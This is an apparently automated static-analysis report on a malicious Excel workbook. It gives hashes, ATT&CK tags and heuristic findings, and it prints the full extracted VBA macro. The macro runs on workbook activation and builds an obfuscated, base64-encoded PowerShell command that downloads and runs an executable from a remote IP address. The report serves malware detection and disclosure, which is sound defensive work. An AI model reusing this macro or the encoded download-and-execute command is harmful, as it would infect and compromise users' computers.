Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9f8a480fdb31d5a2…

MALICIOUS

Office (OOXML)

102.9 KB Created: 2021-08-19 14:03:52 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-10-16
MD5: 760cd667b976aa71bf9bf097f6d292d2 SHA-1: 12b207bf0e0c04474732f8e2eeb3bf1bcc4da08b SHA-256: 9f8a480fdb31d5a238b55885ce2e9e9e3c827624b261d35f5714d1ac0770c0bb
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic

The sample is an Excel file containing VBA macros. The macro uses obfuscation by splitting string literals to reassemble the command 'powershell.exe -win 1 -enc JABQAHIAbwBjAE 4AYQBtAGUAIAA9ACAAIgBOAGgAdQ BlAHkAdgB6AGQA eABtAG8AagBpAG EAeQB5AGkAdQBk AGsAbgBnAG4AeQ AuAGUAeABlACIA OwAoAE4AZQB3 AC0ATwBiAGoAZQBj AHQAIABTAHkAcw B0AGUAbQAuAE4A ZQB0AC4AVwBlAG IAQwBsAGkAZQBu AHQAKQAuAEQAbw B3AG4AbABvAGEA ZABGAGkAbABlAC gAIgBoAHQAdABw ADoALwAvADEAOA AuADEAOQA1AC4 A MQA0ADMALgAxAD gAMwAvADYALwA3 AC8ASQBNAEcAXw AwADYANwA4ADUA NAAxADAAMAAwAD AAMAAxADMALgBl AHgAZQAiACwAIg AkAGUAbgB2ADoA QQBQAFAARABBAF QAQQBcACQAUABy AG8AYwBOAGEAbQ BlACIAKQA7AFMA dABhAHIAdAAtAF AAcgBvAGMAZQBz AHMAIAAoACIAJA BlAG4AdgA6AEEA UABQAEQAQQBUAE EAXAAkAFAAcgBv AGMATgBhAG0AZQ AiACkA'. This command decodes to a Base64 encoded string which, when decoded, indicates the download and execution of a file from a specific URL. The use of Shell() and obfuscated PowerShell execution points to a downloader or droppper functionality.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2662 bytes
SHA-256: 81040dbcb9f2800e697f58bb5d932d7620d70cb03bb03d28433f8eb2b58ad310
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

End Sub

Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub

Private Sub Workbook_Activate()
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim s As String
s = s + "start /MIN C:\Windo"
s = s + "ws\System32\" + "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe"
s = s + " -win 1 -enc"
s = s + " "

s = s + "JABQAHIAbwBjAE"
s = s + "4AYQBtAGUAIAA9"
s = s + "ACAAIgBOAGgAdQ"
s = s + "BlAHkAdgB6AGQA"
s = s + "eABtAG8AagBpAG"
s = s + "EAeQB5AGkAdQBk"
s = s + "AGsAbgBnAG4AeQ"
s = s + "AuAGUAeABlACIA"
s = s + "OwAoAE4AZQB3AC"
s = s + "0ATwBiAGoAZQBj"
s = s + "AHQAIABTAHkAcw"
s = s + "B0AGUAbQAuAE4A"
s = s + "ZQB0AC4AVwBlAG"
s = s + "IAQwBsAGkAZQBu"
s = s + "AHQAKQAuAEQAbw"
s = s + "B3AG4AbABvAGEA"
s = s + "ZABGAGkAbABlAC"
s = s + "gAIgBoAHQAdABw"
s = s + "ADoALwAvADEAOA"
s = s + "AuADEAOQA1AC4A"
s = s + "MQA0ADMALgAxAD"
s = s + "gAMwAvADYALwA3"
s = s + "AC8ASQBNAEcAXw"
s = s + "AwADYANwA4ADUA"
s = s + "NAAxADAAMAAwAD"
s = s + "AAMAAxADMALgBl"
s = s + "AHgAZQAiACwAIg"
s = s + "AkAGUAbgB2ADoA"
s = s + "QQBQAFAARABBAF"
s = s + "QAQQBcACQAUABy"
s = s + "AG8AYwBOAGEAbQ"
s = s + "BlACIAKQA7AFMA"
s = s + "dABhAHIAdAAtAF"
s = s + "AAcgBvAGMAZQBz"
s = s + "AHMAIAAoACIAJA"
s = s + "BlAG4AdgA6AEEA"
s = s + "UABQAEQAQQBUAE"
s = s + "EAXAAkAFAAcgBv"
s = s + "AGMATgBhAG0AZQ"
s = s + "AiACkA"


ActiveWorkbook.Save
batch = "Lauzwnihixafsej.bat"
Open batch For Output As #1
    Print #1, s 
    Close #1
    i = Shell(batch, 0)

End Sub

Private Sub Cellss()

End Sub

Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)

End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 6656 bytes
SHA-256: 908014540259f2e929940a154fc1e18f6e8a756f4af04db55c2bc52014ed41dd